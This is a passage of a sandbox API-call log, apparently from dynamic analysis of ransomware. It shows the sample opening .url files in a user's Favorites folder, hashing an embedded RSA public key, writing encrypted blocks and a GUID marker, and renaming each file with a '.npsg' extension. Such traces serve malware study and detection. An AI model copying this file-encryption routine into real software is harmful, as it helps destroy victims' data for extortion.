KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.777] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.778] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0237.779] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.779] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.779] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.779] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.779] GetLastError () returned 0x0 [0237.779] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.779] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0237.779] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.779] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.779] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.779] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.780] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.780] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.780] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.780] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.780] CloseHandle (hObject=0x644) returned 1 [0237.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393a30 [0237.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b83cd0 [0237.783] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.npsg")) returned 1 [0237.785] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0237.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0237.785] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned=".url" [0237.785] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.785] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=133) returned 1 [0237.786] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.788] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.788] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.790] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x85, lpOverlapped=0x0) returned 1 [0237.790] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.790] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.790] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.790] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0237.791] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.791] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.791] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.791] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.791] GetLastError () returned 0x0 [0237.791] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.791] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0237.791] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.791] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.791] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.792] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.792] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.792] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.792] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.792] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.793] CloseHandle (hObject=0x644) returned 1 [0237.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393a30 [0237.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b83cd0 [0237.798] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.npsg")) returned 1 [0237.800] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0237.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0237.800] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned=".url" [0237.800] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.802] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=134) returned 1 [0237.802] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.804] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.805] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.806] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x86, lpOverlapped=0x0) returned 1 [0237.806] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.806] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.806] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.806] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0237.807] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.807] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.807] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.807] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.807] GetLastError () returned 0x0 [0237.807] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.807] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0237.807] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.807] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.808] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.808] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.808] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.808] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.808] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.809] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.809] CloseHandle (hObject=0x644) returned 1 [0237.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d7c0 [0237.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b83cd0 [0237.812] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.npsg")) returned 1 [0237.814] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0237.814] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0237.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0237.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.814] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0237.815] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0237.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 